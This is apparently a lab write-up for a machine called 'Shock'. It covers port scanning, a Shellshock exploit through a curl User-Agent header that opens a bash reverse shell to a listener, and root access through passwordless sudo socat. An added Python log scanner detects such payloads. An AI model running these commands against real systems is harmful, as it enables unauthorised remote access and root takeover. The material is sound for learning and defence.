Shock

Last updated 3 years ago

nmap

mkdir nmap
sudo rustscan -a 172.31.1.3 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

A web service is open on port 80.

We can confirm that port 80 really is a web server.

Let's run Nikto. After running for some time, it reports that the server appears to be vulnerable to ShellShock.

Exploitation

sudo nc -lvnp 80
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.0.41/80 0>&1' http://172.31.1.3/cgi-bin/test.cgi

Adjust the payload to your needs and the listener should receive the shell.
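
From the defender's side, the request above leaves a distinctive trace in the web server's access log: a bash function-definition prefix, `() {`, inside a header value. The following is an added example, not part of the original writeup. It scans combined-format access log lines for that prefix. The log lines are constructed samples (the addresses other than the two from this page, the timestamps and the client strings are made up), and the names `scan` and `SAMPLE_LOG` are hypothetical.

```python
import re

# Apache/nginx "combined" format:
#   ip ident user [time] "request" status size "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED + r'$'
)
# Bash function-definition prefix that Shellshock abuses: "()" then "{", any spacing.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')
# Hints that the trailing command tries to connect back out from the server.
CALLBACK = re.compile(r'/dev/(?:tcp|udp)/|\b(?:nc|ncat|socat|curl|wget)\b')

def scan(lines):
    """Return one finding per log line whose request, Referer or User-Agent
    carries a function-definition prefix."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not combined format: skip instead of guessing at fields
        ip, request, status, referer, agent = m.groups()
        for field, value in (("request", request), ("referer", referer), ("agent", agent)):
            if FUNC_DEF.search(value):
                findings.append({
                    "line": n,
                    "src": ip,
                    "field": field,
                    # second token of the request line, "" if it is malformed
                    "path": (request.split(" ") + ["", ""])[1],
                    "status": int(status),  # 200 suggests the CGI actually ran
                    "callback": bool(CALLBACK.search(value)),
                })
                break
    return findings

# Constructed sample log (not captured from the lab machine).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:00:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.10.0.41 - - [01/Jan/2000:00:00:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 0 "-" "() { :; }; /bin/bash -i >& /dev/tcp/10.10.0.41/80 0>&1"',
    '192.0.2.20 - - [01/Jan/2000:00:00:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :; }; echo test" "curl/7.68.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 on a CGI path and `callback` set is the combination to triage first.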

Privilege Escalation

Running sudo -l confirms that we can run socat as root without a password.

To gain root privileges, run the following:

sudo socat stdin exec:/bin/sh

Since the ShellShock vulnerability is well known, instructions for exploiting it to get a reverse shell can be found on HackTricks.